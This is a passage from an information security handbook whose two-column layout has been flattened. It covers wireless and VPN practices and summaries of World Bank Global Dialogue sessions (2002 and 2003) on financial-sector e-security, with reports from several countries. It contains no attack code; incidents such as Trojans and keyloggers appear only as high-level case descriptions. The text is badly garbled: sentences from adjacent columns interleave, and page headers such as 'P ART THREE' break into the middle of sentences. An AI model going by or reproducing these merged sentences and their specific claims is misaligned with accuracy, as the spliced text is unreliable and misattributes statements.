or other VPN enabled and only after is clearly a problem if banks desire to use the Internet authenticating to that software can be granted access to pass important, confidential business information. to the internal network. The firewall rules may also be VPNs overcome these obstacles by using a strategy used to limit where traffic originating from wireless called tunneling. Instead of packets crossing the networks may traverse. Make sure that the network Internet out in the open, data packets are first firewall is between all wireless access points and the encrypted for security, and then encapsulated in an IP internal network or Internet. package by the VPN and tunneled through the Internet. 15.Disable DHCP and use static IP addresses for your Many vendors such as Nokia, Cisco, Nortel, Checkpoint, wireless NICs. Also change the default IP and Microsoft among others have viable, secure VPN address range for your wireless network from technologies100 that can be deployed at multiple loca- the manufacturers default. tions in a corporate network. While VPNs provide content protection for that information traversing the 16.Purchase access points that have "flashable" network, depending on how they are deployed, they firmware only. There are a number of security may not provide any protection from extraneous enhancements that are being developed, and you want users accessing the network itself. In other words, P to besure that you can upgrade your access point. an unauthorized user may not be able to see the ART content because of the VPN, but they can still access Additional Information on VPNs the network resources and utilize the bandwidth causing network congestion and possibly denial of service to THREE To protect information systems that may use any of authorized users. Access control, authentication, and these technologies, users should deploy Virtual Private encryption are vital elements of a secure connection. Network (VPN) technology at each and every trusted The Point-to-Point Protocol (PPP) has long been used gateway into their networks and ensure that every user as the Internet's universal link layer for creating tunnel accessing the trusted network uses VPN technology. A links between devices, but in more recent years, the virtual private network is essentially a private connec- Point-to-Point Tunneling Protocol (PPTP) and Layer 2 tion between two machines that sends private data traf- Tunneling Protocol (L2TP) have prevailed.101 fic over a shared or public network, the Internet. VPN technology lets an organization securely extend its net- work services over the Internet to remote users, branch offices, and partner companies. In other words, VPNs turn the Internet into a simulated private wide area network (WAN). VPNs allow remote workers access their companies' servers. To use the Internet as a private wide area network, organizations may have to overcome two main hurdles. First, networks often communicate using a variety of protocols; VPNs provide a way to pass non-IP protocols 99 Rick Fleming, VP of Security Operations, Digital Defense, Inc. 100The standards for VPN are currently in revision by the IETF to make IP Sec more secure, but also make it compatible with satellite communications. 101Karen Bannan's article "Safe Passage" in PC Magazine reviews seven VPN providers for products that would suit a medium-size business with a budget of $10,000 that needed a VPN for its central and branch offices. http://www.pcmag.com/print_article/0,3048,a%3D12352,00.asp 150 INFORMATION SECURITY AND GOVERNMENT POLICIES CHAPTER 13. purposes, as well as the technology sector for GLOBAL DIALOGUES ON SECURITY intellectual capital. AT THE WORLD BANK The introduction to e-risk also addressed the topic of At a Glance wireless vulnerabilities, specifically in GSM (Global Standard Mobile). Two key points were made with regards to wireless risks: the gateway vulnerability, and the "man The following international examples of IT security in the middle" attack. The latter can occur because cellular breaches, solutions, and current policy initiatives are towers fail to authenticate to cellular phones. drawn from two events held by The World Bank. The first Global Dialogue, "E-Security: Risk Mitigation in the Legal and Regulatory Issues Financial Sector" took place on September 25, 2002. The second Global Dialogue, "Electronic Safety and While five years ago, e-commerce laws were relatively Soundness" took place on September 10, 2003. Videos uncommon, today, there are forty countries with e-com- for both sessions are available in online.102 This chapter merce laws and the number is growing. Of particular contains the highlights of each session including the importance, consumer electronic transaction law, rights comments of representatives from participating countries. and responsibilities, are all vibrant areas of legal devel- opment. Key issues include: Global Dialogue 2002 "E-Security: Risk Mitigation in the Financial Sector" 103 - the validity of electronic signatures and transactions, The session opened with an introduction to e-risk. - individual data protection, note Privacy and the Fair Themes included the shift from closed to open networks Information Practice Guidelines, within the past ten years. On open networks, the - payment systems between banks, particularly dependence on silver bullets, such as SSL which has e-banks, been cracked, has become problematic because they - money laundering and the level of international perpetuate vulnerabilities. For banks, not only are there cooperation required to prevent it, dangers of blended threats, such as Code Red, but also - advances in cyber crime law that address the use of organized hacking crime rings. Many of these crime of computers in criminal acts rings use online casinos as money laundry tools. The International Data Corporation (IDC) estimates that Enforcement requires compliance, cease and desist 57% of hacks have been against the financial industry. orders, and the ability for regulators to remove malicious Furthermore, as the level of sophistication in hacks data from systems. While there has been inter-industry increases, the skill level decreases due to the ubiquity cooperation on some levels, the security of e-payments, of downloadable, malicious code that anyone with even for example, has led to a collision of telecom and bank- limited knowledge can launch large-scale attacks. ing. The banking industry defined safety and soundness as the "non-discriminatory access to safe and sound Methods of e-fraud include identity theft and extortion-- financial systems." The telecom industry paradigm, on both highly profitable--especially in attacks the other hand, was "universal access for the public originating in Eastern Europe against the United interest and welfare." These slightly different approach- States. Other methods include salami slicing, funds es to the definition of "safe service" create difficulty transfers, and stock manipulation. Attacks in Asia when organizations are attempting to secure networks specifically targeted the financial sector for obvious and meet commercial needs simultaneously. 102Please note, the full streaming video for the 2002 proceeding can be obtained on The World Bank website, at: http://www.worldbank.org/wbi/B-SPAN/sub_e-security.htm. The video for the 2003 proceeding may be obtained at http://www1.worldbank.org/finance (Click on E-security, within the Conference section.) 103This session was conducted by The World Bank, Integrator Group Members: Thomas Glaessner, Tom Kellermann, and Valerie McNevin, with Global Dialogue Participants from a range of countries including Brazil, Chile, Mexico, Ukraine, Bulgaria, Slovakia, Singapore, South Korea, Philippines, Hong Kong, Sri Lanka, and P.R. China. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 151 Supervision and Prevention encryption will not protect organizations against every threat possible. 12 core layers of proper secu- In spite of the difficulty with meeting the dual needs of rity are essential for maintaining the integrity of safety and soundness, electronic security is a critical data and mitigating the risks associated with open need of most organizations and there must be a con- architecture environments, and in many instances, certed effort to reduce operational, legal, and reputa- actual implementation of a specific layer need not tional risk in the IT environment. Plans to increase the entail large capital investments or outlays. The 12 security of systems must include: layer checklist is presented in Chapter 11, Part 3. - Education, awareness, and skills training. The World Country Contributions Bank study shows that 50% of the e-security intrusions are by insider threats. This figure is larger when Hong Kong including misuse or failure for safe computing techniques. Representatives from the Hong Kong Monetary Authority opened with an overview of three recent fraud cases: - Auditing and examination processes. There must be 1) A Hacker used Trojan horses to get passwords and cross-border coordination in order to effect change IDs, with which (s)he conducted an unauthorized trans- in the speed at which issues are addressed. For fer of over US$35,000; example, EU banks have servers in Antigua; this 2) A case of E-Payment fraud in Australia occurred as a illustrates the ease with which banks can fail, if result of poor customer awareness of password security; P servers are shut down, and immediate action is this enabled hackers to crack the payment system and, ART hindered by cross-border coordination problems. because institutional limits were not imposed, it is esti- mated that over US $3 million were stolen; - Public-Private Cooperation. Reputational risk leads 3) In a case of online dealing fraud, hackers broke into THREE to a lack of reporting. Thus, it is critical to hold a system in order to sell 5 million shares (equivalent to roundtables to discuss both legal issues as well US $21.7 million), and effectively manipulated the as emerging threats. Some examples of functional stock prices. public-private partnerships are the NIPC's InfraGard, a partnership between private industry and the U.S. The lessons learned from these incidents were as follows: government, represented by the FBI. The Forum of 1) Pre-register all third party accounts - this entails Incident Response and Security Teams (FIRST) is controlling all unauthorized accesses and transfers. another form of partnership, bringing a variety of 2) Monitor e-bank transactions and control suspicious computer security incident response teams from accounts and transactions (over SMS, or e-mail accounts government, commercial, and academic organiza- to unregistered third party accounts) tions together. FIRST aims to foster cooperation 3) Use multiple factors for customer authorization, and coordination in incident prevention, prompt such as customer specific information (something that rapid reaction to incidents, and promote information only the individual customer knows or has, like a smart sharing among members and the community at large. card. Passwords may only be valid once. Other collaborations include: The Internet Security 4) Secure awareness of customer (the weakest link) - Alliance (www.isalliance.org) and the Computer due to the ability to use multiple channels or methods Emergency Response Team (CERT). This is a collabo- for transfers, communications should be secure, includ- rative effort between Carnegie Mellon University's ing installing personal firewalls and updating intrusion CERT Coordination Center and a cross-section of detection systems. private international companies. 5) Incidents must be handled and reported quickly, in - Layered Security. The most effective approach to IT order to ensure effective responses from the security team. security is a layered approach that is not just covered by technology, but also by people and processes. Over-reliance on silver bullet solutions such as 152 INFORMATION SECURITY AND GOVERNMENT POLICIES In Hong Kong, the government is collaborating with have underscored the importance of security policies banks and police for handling incidents, ensuring and procedures in the e-finance environment: responsiveness, reporting incidents, controlling damages, and ensuring public confidence through 1) In one incident, customers of the biggest bank in effective PR management. Hong Kong also noted that, Singapore had their PC's penetrated by Trojan horses. with regards to ISPs, the variety of existing standards These Trojans illicitly acquired confidential user make it difficult to control, secure, and create information in order to extract large sums of money. awareness of security issues. This particular Trojan was so sophisticated that it escaped the notice of both anti-virus software and Singapore intrusion detection systems, thus highlighting that these tools should not be the only forms of defense Singapore's discussion revolved around four key areas: employed by a commercial entity. the Korean connection, the state of e-finance, the national PKI (Public Key Infrastructure), and recent 2) An earlier incident involved the second largest incident and government actions. Beginning with the bank in Singapore and did not attract as much topic of connectivity, Singapore juxtaposed the follow- international attention. In this case, the bank's ing figures from 1998 and 2001 to illustrate the rapid systems were attacked on unpatched vulnerabilities. technological diffusion: The incident specifics were not shared for reasons of confidentiality. However, this incident illustrates - in 1998 revenues from e-commerce totaled US $40 the need for cooperation among regulatory agencies. million; in 2001, the total is US $91 billion; - in 1998 there were about 14,000 households with In Singapore, the government has been actively high speed access; in 2001 was 7.8 million, or 64% involved in endorsing Public Key Infrastructure. The of the total population; Digital Signature Act of 1999 governs the national PKI - in 1998 Internet usage was at 3 million, this figure with the Ministry of Information Communications hold- is up to 24 million in 2001 (half the population in ing responsibility. The National PKI designates licensed Korea); certificate authorities (CA). There is a mutual recognition - Mobile penetration is greater that 50% of the total of the certificate. The Korean Information Security Agency population. (KISA) handles more technical issues, including oversee- ing issues of CA, licensing CA, and conducting research E-Banking has proven to be very popular in Singapore. and development for both wired and wireless PKI. E-Banks are both popular and pervasive in Singapore. Despite a small population of 4 million people, There are currently six, licensed CA's. Due to this approximately 25% of the population engages in online variety, certificates are mutually recognized so that banking. In addition, the industry is experiencing rapid customers can engage in diverse financial services with growth. Online trading began in 1997 and now accounts a single signature. Thus, the user of a digital signature for about 50% of all trades. As a counterpoint, the is protected legally. However, there are challenges, for insurance industry is not growing as quickly, though example, in the banking industry, there is widespread this may be attributed to the nature of the product; use of licensed CA's. However, this is not the case in insurance products tend to be customized and allow brokerage firms; only 4 of 36 securities firms use for little standardization. licensed CA's. There are two reasons for this: 1) Online trading started in 1997, 2 years prior to the Looking at the criminal side, the statistics for cyber- enactment of the Digital Signature Act. Thus, users are crime incidents shows that there were approximately comfortable trading online in the absence of a licensed CA. 100 hacking incidents between the years 1996-1997. 2) The use of CA delays the securities transaction and In the year 2000, there were 5,000 reported cases. customers do not want the inconvenience and potential This figure is increasing exponentially. Although loss associated with delayed trades. e-Banking is popular, two recent security incidents Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 153 However, a recent incident in Korea has altered the Credit card fraud has proven to be a challenging area e-security landscape in the context of online trading. for the Philippines (and elsewhere). The country is In August, several brokerage firms found dormant bro- home to 2-3 million credit card holders, approximately kerage accounts. They placed buy-orders for US $20 mil- 17 issuing banks, and supports many millions of busi- lion, buying stocks from institutional investors that ness transactions a year. It is estimated that approxi- were also part of the scheme. As a reaction, security mately 400 million pesos (roughly equivalent to US $8 measures have been augmented. Licensed CA's will million) of lost revenue are attributable to credit card become mandatory at a faster rate than originally con- fraud. ATM cards are also in widespread use, with ceived. On December 1, 2002, private certificates will approximately 10 million cardholders. no longer be allowed. As of September 1, 2002, only licensed certificate authorities (LCA's) can be used. By Third, 9/11 pushed banks to reach out to other countries May 2003, all certificates must be licensed. In online in order to seek international cooperation on the topic trading, it will be mandatory for all large brokerage of e-security. firms to use licensed CA's by November 2002, and all small firms by January 2003. As with other locations around the world, in the Philippines e-finance is still in the early stages In the spring of 2003, Singapore will publish of development. Of the 8 recommended pillars in Technology Risk Management Guidelines. Their efforts E-Security: Risk Mitigation, the Philippines has are guided by international efforts and best practices in incorporated the legal framework and enforcement, industry, based on a series of informational meetings public private cooperation, and improving law P between banks, industry participants, and government enforcement capabilities. The Philippines still needs ART officials. One of the key questions for Singapore, which law enforcement experts, including special courts has a single regulator to enforce compliance to stan- comprised of expert panels. Other areas of need include dards, is how a larger nation, like the U.S., deals with information databases and education to all stakeholders, THREE standards enforcement when faced with a much larger including consumers, corporations, and vendors. number of regulatory agencies. The Philippines had two main questions: 1) To what Philippines extent has the United States addressed trade-offs between reporting and protecting reputations? and 2) The Philippines discussion focused on ramifications of What is the state of international enforcement on cyber three possible trends as an indication of the growing crime laws? threat of cyber crime. These are the dissemination of viruses (e.g. "I Love You"), the continuing battle Sri Lanka against credit card company fraud, and, 9/11. Though 9/11 occurred in the U.S., the Philippines use this Sri Lanka began by providing a background on the example to demonstrate their government's measures to of e-finance, discussing its limitation on account of protect national financial institutions. penetration of Internet users and awareness among users on e-security. Sri Lanka believes telecom expan- In the Philippines, the spread of the "I Love You" virus sion issues will be resolved in the near term. The prob- prompted immediate regulatory actions. This incident lem with awareness is that it does not exist at the was important because it exposed weaknesses in both Board level. Thus, it is difficult to gather support the public and private sectors. The government respond- for issues such as expansion of connectivity. Among ed by passing e-commerce laws and cyber-strategy laws. customers, there is an additional lack of awareness on Furthermore, it exposed the capacity of law enforcement how secure online transactions can be. As a result, to understand and respond effectively to technology- trust is low among customers and they are reluctant driven incidents. A program on computer security train- to engage in online transactions. Instituting guidelines ing was launched for law enforcement personnel. and frameworks for service providers can help generate confidence in the customer base. 154 INFORMATION SECURITY AND GOVERNMENT POLICIES Sri Lanka's question concerned Internet Service not simple to implement on many applications. The Providers. They asked whether there were policy key facets in Bulgaria's payment systems are vendors, guidelines or frameworks for e-security regulation reliability, and price. There is a demilitarized zone for for ISPs? They also requested information about the bank services, which includes the gateway for all Korean security agency, and whether it was private Internet facing applications, and firewalls. Through or national and what role(s) they support. BANKNET, Bulgaria has strict access from the Internet to the network. Most attacks occur on websites and Bulgaria e-mail servers because they face the Internet. Behind the firewall, there is much scrutiny over bank services Bulgaria's bank services were established in 1989, and interbank applications. with a culture similar to that in the United States and Europe. Recent developments include the establishment In Bulgaria and elsewhere, central banks are building of a payment system and software packages specifically legal frameworks on electronic payment systems, which for the commercial banking industry. One such example consists of new regulation on payments and national is BANKNET. Bulgaria approaches e-security by asking payment systems. This establishes a legal basis for the fundamental questions about what must be protected. numerous national payment systems, which include cen- They identify the critical elements as the physical tral depository payment systems and bankcard payment network, internal information systems, applications, systems, among others. Bulgaria finds that the currency and data protection, specifically, data exchanges policy presents a challenge, as the conditions are diffi- between banks and clients. cult for attaining a legal balance. They ask about the role that payment systems oversight must play in com- From an organizational standpoint, Bulgaria has an municating e-security of payment systems. They ask Internal Commission who is responsible for analysis and whether laws should be flexible and soft on coopera- recommendations. The establishment of e-security policies tion, or whether should there be more stringent over- requires monitoring and supervision of networks and sight of the system. Brazil and South Africa have a applications, including up-to-date software and hard- stringent approach on surveillance and oversight on ware, and lists of concrete, specific actions. Bulgaria payment systems; they are aiming to design an efficient identifies e-security of payment systems to be extremely and competitive system. In some areas, regulation can critical. Supervision and prevention changes include become a de facto monopoly in provisions of retails education, which is a critical component of their systems and careful consideration of regulations and security planning. They note that they need work third party operators must include an assessment of on legal frameworks and enforcement, including how the technology will affect the retail system. legal and technological conventions between the various network participants. Conclusion In Bulgaria, there is a legal framework on e-signatures, In conclusion, all participating nations identified the which also includes an e-document law, regulation of need for further cross-border educational and training certificate authority activities, and requirements for efforts in the area of e-security. At The World Bank, advanced e-signatures. Currently, the bank would like to the Integrator Unit is recognized for its dedication establish a common PKI. Banks may become the CA to providing best practices reports and seminars within the common PKI for specific applications; though on electronic risk mitigation. there is a need for flexibility in their layers and uniform technologies for interbank systems. Bulgaria also has an issue with security policies - they must define reliabili- ty, as well as business requirements. E-signatures are Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 155 Global Dialogue 2003 "Electronic Safety First, e-security efforts tend to be reactive rather and Soundness" 104 than proactive; this approach should be changed to a continuously proactive effort to combat present and This session stressed the importance of addressing future threats. e-security issues in a global context, particularly since the risks in emerging markets are growing at a dramatic Second, cooperation on international issues is rate. Security issues are exacerbated by the irregularity critically important, particularly for supervisors and in press reporting; between hype and conjecture, much law enforcement agencies. However, even in a single of the information regarding electronic safety is inaccu- country, intra-agency cooperation can become a rate. Meanwhile, worms, viruses, and other types of complex endeavor. electronic threats are taking a toll on critical infrastructures around the world. Third, incident reporting is a serious obstacle to understanding the scope of the threats facing us today, The problem of e-security is compounded by a shortage as there is still considerable reluctance to expose of trained information security teams, a lack of sound security breaches. governance procedures, and emerging technologies including mobile communications. The information tech- Fourth, in tandem with reluctance to report security nology (IT) backbone is growing at a rapid rate, and as incidents, response times to breaches lag in many cyber threats and vulnerabilities rise with equal rapidity, e-security efforts. trillions of dollars are put at risk. The purpose of the P Global Dialogue is not to ask why security breaches Finally, personnel issues remain central: it only takes ART occur, but to ask what can be done to curb the problems. one naive user to compromise the integrity of an entire network. Increased awareness of the threats is necessary. E-Security Risk Mitigation: Soft and Hard Ultimately, e-threats will create a loss of public confidence THREE Infrastructure Combined in communication technologies if they are not handled correctly. Bearing that in mind, several steps should be E-security may be defined as "any tool, technique or taken to further progress e-security efforts: process that protects a system's information assets from threats to confidentiality, integrity, or availability." First, regulators, financial institutions, and other market E-security is composed of two infrastructures: a soft participants should determine and contribute to the infrastructure that includes policies, procedures, processes, dissemination of best practices in IT security. and protocols, and a hard infrastructure that includes hardware and software. An increased reliance on tech- Second, collaboration should become commonplace, nology escalates the potential for e-security threats. As particularly with respect to resolving the key security we have seen in previously, attacks are taking place more threats facing organizations and the consumer-public. frequently and are often launched as blended threats, which are difficult to disarm. The speed and tenacity of Third, security personnel and auditor training should be a the hacking community is growing quickly, due in part to top priority in commercial and government practice. The activities of organized crime and terrorists. definition and containment of operational risk should include the various forms of cyber-risk, in addition to the The task of deploying effective e-security programs is a traditional forms of physical and information risk. significant challenge for several reasons: 104This session was conducted by The World Bank, Integrator Group Members: Thomas Glaessner, Tom Kellermann, Valerie McNevin, Yumi Nishiyama and Shane Miller, with commentary from Global Dialogue Participants including Brazil, Chile, Colombia, Mexico, Saudi Arabia, Ukraine, Australia, Beijing China, Hong Kong China, Malaysia, Philippines, Singapore, and Sri Lanka. See http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/SearchGeneral?openform&E-Security/E-Finance&Presentations for original documentation of these sessions. 156 INFORMATION SECURITY AND GOVERNMENT POLICIES Supervision of Information Security and which users are encouraged to strengthen their Technology Risk resistance to attack, user should: 1) enable a power-on password, 2) install anti-virus software, 3) install a While the IT sector grows beyond the bounds of local personal firewall along with robust encryption (e.g. talent capacity, outsourcing has become a major trend. S/MIME), 4) ensure that devices are stored securely International outsourcing, in particular, has taken off, and that the desktop applications mirroring software a situation that creates both problems and opportunities is password protected, and 5) virtual private network for organizations worldwide. Recent efforts to mitigate (VPN) software should be installed. In the smart card e-threats include a proposed guidance requiring banks to context, third parties should not handle PIN numbers. develop a response program for protecting against threats to customer information that is maintained by the bank or Country Presentations its service providers. The components of such a program would include procedures for notifying customers about In the course of the global dialogue, each of the any incidents of unauthorized customer information participating countries were asked to answer the disclosure that could result in substantial harm or following three questions: inconvenience to the customer. 1. What trends do you see with regard to e-security In spite of fairly complex policy and procedure initiatives, incidents? What are the largest challenges/vulnera- security continues to take a backseat to ease of use. bilities (e.g., identity theft, denial of service/sys- Therefore, continued education, training, and vigilance tems access, money laundering over the Internet, are crucial for augmenting contemporary security other forms of electronic fraud, etc)? efforts. Some emerging security areas that warrant addi- 2. At present, what processes are your financial tional attention include: vulnerability assessment, institutions following to mitigate electronic penetration testing, intrusion detection systems (IDS), security risks and what changes in supervision and forensics. process are you considering? 3. How could the multilateral institutions, in coordination Mobile Technologies: New Rewards and with other supervision agencies and the EBG, best New Risks assist you? In 2002, Global System Mobiles (GSM) had approximately Brazil 787 million users worldwide. Wireless is growing at a rate three times faster than that of landlines. GSM is The representative from Brazil noted that competition just as susceptible as other transmissions technologies drives companies to implement high technology, but to contract malicious code, such as Trojan horses, e-mail these technologies tend to be vulnerable. There is a viruses, and denial of service (DOS) attacks. In the hostile trade-off between the costs of the services and frauds. environment of the Internet, wireless is the "Achilles With respect to supervision, examination techniques in heel of security." Often, the wireless connections are Brazil are increasing in effectiveness. the weakest link in the security chain. The GSM vulnera- bilities include SIM-Card vulnerability, SMS bombs, WAP In answer to how multilateral institutions can best vulnerabilities, and what is commonly referred to as the assist Brazil, they respond that they would like assistance "man in the middle" attacks.105 with: training examiners, creating security methodologies and standards, and creating security models and minimum Although it is not possible to secure the GSM bank regulations. technologies completely, there are several easy steps 105In this type of attack, a modified cellular phone acts as a rogue base station for other cellular phones, therefore given the ability to steal infor- mation over the air. Information is naked at the Gateway, leaving a massive vulnerability to users and their information. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 157 Questions: Question: Brazil asked how they can create a legal framework Mexico inquired about the depth about Singapore's to deal with crime, especially considering that the guidelines. dynamic nature and the rapid pace of technology make legislating problematic. Response: The general security practices of Singapore can be Reponses: accessed online.106 The Guidelines include 26 practices In response, a representative from Singapore suggested that range from the operating system (OS) level, instituting tough penalties, as well as updating laws patches, roles and responsibilities, anti-virus software, on a regular basis. To take Singapore's example, laws firewalls, and so on. such as the Computer Misuse Act have proven to be beneficial in clarifying what computer crime is and Colombia reducing its appeal for casual hackers. The representative from Colombia stated that the A representative from Infragard, FBI, stated that this is security challenges they face are the same as those a social phenomenon across all boundaries. In some faced by all countries, yet Colombia feels ill-prepared. cases, perpetrators do not realize the severity of the At the present time, Colombia has no standard for incident crimes they are committing, and in fact, some people response. There is no Computer Emergency Response may not consider computer crimes "crimes" at all. Team (CERT). Colombian clients are liable for cyber Moreover, banks tend to perpetuate a "myth of safety." incidents. Identity theft is rising. Bank cards are being P More public recognition of the risks in e-finance and cloned. There is no privacy regulation. Risk mitigation ART e-commerce is necessary, as shielding the data on is an auditor problem. PKI and smart cards are used, security incidents only exacerbates the problem. In but e-security for banks seems to be an abstraction. particular, there is a tremendous problem with the Unfortunately, employees do not generally care about THREE cross-border nature of e-crime, including cyber hacks security practices and security is not ingrained into and bank site alterations. As a result, international the banking culture in Columbia. Keeping up to date collaboration is necessary. is a huge problem. México In this context, there is clearly a role for multilateral organizations. For example, UNCITRAL is a model law for In response to the question concerning trends in computer crime, vandalism, privacy, denial-of-service, e-security incidents, Mexico noted that PIN numbers and transnational issues. Model laws should be based are increasingly accessible via the web, making it a upon civil law rather than common law. large risk. However, they are making a substantial effort to mitigate e-risk; financial institutions have Question: strong monitoring capabilities and there are many Colombia inquired how does one raise the integrity security and monitoring companies with expertise in IT of security within financial institutions, especially security. In addition, Mexico has adopted the BASEL with cost-benefit considerations. Liability and risk recommendations for technology risk management. management are fundamental concerns, especially with respect to customers. On the question of how multilateral institutions can assist Mexico, they recommend a global information Responses: exchange among multiple agencies order to share Collaboration is necessary because of jurisdictional incidents, assessments, and risk mitigation needs. issues, even in identifying the location of the loss 106http://wbln0018.worldbank.org/html/FinancialSectorWeb.nsf/(attachmentweb)/Singpore_TRMguidelines28Feb03/$FILE/ Singpore_TRMguidelines28Feb0 107All banks are a part of the National Bank system. 158 INFORMATION SECURITY AND GOVERNMENT POLICIES associated with a cybercrime incident. To begin with, Though there is a clear need for digital forensics cross border standards should be adopted so that a com- guidelines, there are no standardized methods mon language can be used to describe the problems and accepted by the courts currently. set up a plan for their mitigation. As an example, there has been difficulty with defining "fraud" within the EU. Australia One example of a cross-border organization working in this area is the Financial Action Task Force (FATF), which Australia adopted and implemented the BASEL 2 to deals with anti-terrorism and money laundering. categorize the loss of information. However, they have found that increased use of intrusion detection systems Ukraine has been difficult to justify with so many false positives and misconfigured systems. New technologies are built Following the Ukraine's independence, there was a upon old technologies, thereby increasing the complexi- re-organization of the bank system that included new ty and interdependent nature of the system. At the technology practices, such as electronic transfers. same time, the system may not be well documented. Security technologies such as e-signatures and Learning about system interdependencies is critical, but cryptography are headed by National Banks.107 resources remain limited. Australia points out that free Since independence, e-signatures and e-transfer educational downloads are available to the public on laws have been adopted. While there have been this particular topic. several attempts at cyber intrusions into banks, there have been no reported financial losses. Australia makes three key points. First, Cyber-Crime legislation will exist in all APEC by On the regulatory front, the Ukraine signed the cyber October 2003. This cyber crime legislation includes crime convention in 2001 and the country does prose- e-fraud and cross-border electronic law enforcement. cute for computer misuse. In addition, Parliament has been considering a draft on personal data protection. Second, Law Enforcement education and cooperation is There are provisions of cyber crime in the criminal code, needed across all borders. There will be a compendium however, the laws are limited in their effectiveness of IT development standards. APEC cyber-security will because they require proof that the offense was inten- address wireless, and will conduct a study on risks of tional. In this regard, the lack of forensics becomes a technologies such as Wi-Fi. key issue, as preserving evidence of intentionality is highly problematic. There must be training for security Third, Computer Emergency Response Teams will exist in staff and law enforcement personnel on handling evidence. all APEC countries by October 2003. Question: China, Beijing The Ukraine's primary question concerned responsibility and liability, especially with internal monitoring and The representative from China explained that there reporting efforts. Incident reporting by bank employees, is an overall need to raise public awareness about for example, is critical to creating a more secure bank- the e-security situation and more external assessments ing environment. To help incident response capabilities, are required. Some of the challenges faced by China there is a CERT in the Ukraine. in e-security include a lack of risk awareness and risk management ability, especially considering the complex Response: nature of technological practices in e-security. This On the issue of evidence, it is noted that electronic problem is exacerbated by the lack of cooperation data perishes quickly and there is no standardization for among regulatory and supervisory bodies. handling forensic evidence in cases of computer crime. Information Technology Security Handbook SECURITY FOR ORGANIZATIONS 159 While the security front is uneven, Internet banking is Republic of Korea growing rapidly in China; between 1999 to 2003, the number of Internet banks has grown from 1 to 27, and While the Republic of Korea was unable to participate in the volume of banking transactions has increased over a the Global Dialogue, they submitted their response to the hundred-fold. It was noted that during the recent SARS questions posed by the World Bank. They note that while epidemic, Internet banking surged in popularity. Korea possesses highly advanced information networks, China makes the following suggestions: their security level could be improved. In Korea, 65% of 1) Encourage information sharing on a domestic and total stock transactions occur online and approximately 25 international level; million people use the Internet. Recent incidents, such as 2) Establishment of international e-security standards; the January 2003 Slammer worm, have had serious effects 3) Enhance transparency in e-Banking. in Korea and illustrate the fragile nature of the networks. China, Hong Kong Korea provided statistics to convey the existing low level of awareness on systems security. According to the In Hong Kong, spoofed e-mails are very common, as are Ministry of Information and Communication, only 12.9% of viruses and worms. Concurrently, there is a change in the e-commerce companies, 16.7% of academic institutions, behavior of criminal syndicates. Instead of directly target- and 9.2% of corporations had information security teams. ing banks, they are now targeting the weakest link, the Korea noted that e-security tends to be considered a cost, customer. In this regard, customer education is critical. which may only be addressed given sufficient resource and time. As an example, a relatively small fraction of (12.9%) P A recent incident of a fraudulent bank website of e-commerce companies, and 6.1% of all companies, ART illustrates the security problem. One bank website have installed intrusion detection systems (IDS). generated particular concern, as the URL was an incomplete Hong Kong address and no digital certificate Sri Lanka THREE existed for the website. The fraudulent website claimed the bank had offices in New York and elsewhere, but upon The representative from Sri Lanka explained that threats investigation, it was determined that the bank website, as such as worms and wireless vulnerabilities exist, but Sri well as the bank itself, were fraudulent. The website was Lankan authorities have not heard of any attacks on hosted in China. This incident illustrates the critical need their banks. There have been no publicized or reported for cross-border cooperation and is especially true as threats to the banking systems. Sri Lanka has had ATMs criminal syndicates conduct cross-border crimes. The for 20 years. While e-banking is still in its infancy, its HKMA is taking initiatives to enhance the supervisory popularity is growing rapidly. The public may purchase framework, including customer education, and stocks online, but again, such capabilities are in their disseminating leaflets to inform the public on critical early stages. In Sri Lanka, leapfrogging is proving to be e-security issues and tips for combating crime. the biggest issue at the present time. For financial institutions, awareness is the key and examiners must To further enhance e-security supervision, the HKMA is in assess risks accurately. close relations with domain registrars. Hong Kong employs an automated process to screen local domain names (.hk). Cyber Security in the Singapore Financial Sector If the word "bank", "banque", or any other form of the word is used in a domain name, it is immediately referred Tony Chew, Director of Technology Risk Supervision at to the HKMA. Additional intra-country cooperation exists the Monetary Authority of Singapore (MAS) provided a with the Hong Kong Police force, CERT, and the govern- glimpse of Cyber Security initiatives in Singapore. He ment to set up industry wide incident responses. The opened by saying that the Monetary Authority exists to Supervisory Control Self-Assessment (CSA) includes 70-80 "Inform, control and pressure institutions." Singapore is banks, though since a yearly review is difficult, it is an trying to be a financial hub, and therefore IT is an automated assessment. extremely important issue. 160 INFORMATION SECURITY AND GOVERNMENT POLICIES Two of Singapore's largest banks were attacked by hackers The MAS created a "Technology Risk Management in 2001 and 2002, illustrating the urgent need for Guidelines for Financial Institutions." These Guidelines electronic risk mitigation practices. In 2001, the largest contain 26 recommendations for layered security. Three bank in Singapore, the United Overseas Bank Ltd. core themes in the Guidelines include: 1) establishing (UOB), discovered an intrusion into its Internet banking a robust risk management process; 2) strengthening system. While much of the information concerning the system availability, security, and recoverability; and, incident remains confidential, it is known that hackers 3) deploying strong cryptography to protect data. from Eastern Europe attacked the bank's online system. Bank records were probed and penetrated, and the In addition to technological policies, the MAS requires bank's system was manipulated in order to update banks to conduct on-site evaluations and penetration customer accounts. Not only did it take several months tests at least once per year. The MAS has a Technology for the bank to detect the problem, but it proved Risk Assessment Team, as well as its own rating system labor-intensive and costly to find out who/what caused for banks within the Singaporean system. The rating the problem. is based upon 6 criterion established by the MAS. It consists of a scale ranging from 1 to 5, with 1 being In 2002, another attack took place on Singapore's the most secure, and 5 being least secure. Banks are second largest bank, DBS Bank. In this incident, required to maintain at least a level 2 grade of satisfac- networking sharing capabilities and inadequately tory. They are also expected to have rapid recovery plan configured systems enabled hackers to target customer for their systems. The ratings information is published systems. The hackers planted Trojan horses and key- to banks as an incentive for improving their security stroke loggers into 21 DBS customer accounts, allowing initiatives, and promoting a sense of standards. them to capture personal identification numbers (PIN) Additionally, banks are required to report any security numbers and user identification numbers. While this incidents. incident resulted in a relatively low monetary loss of USD $62,000 from customer accounts, it is important With the increased use of mobile payments, wireless to note that the greater loss occurred in the negative vulnerabilities must be addressed; security practices in publicity resulting from the breach. Newspapers ran wireless banking are monitored in Singapore currently. stories concerning the attack for an entire month, ultimately, such incidents could lead to a crisis of Concluding Questions and Comments confidence in online banking. The final comments and questions outlined key themes One critical point of weakness that may have dominating the Global Dialogue. contributed to these incidents is the common use of single factor authentication. As an example, most ATM First, information and awareness plays a critical role in machines use very basic authentication measures, educating the public on existing e-security needs. though that it will only take one or two more large Government mandates 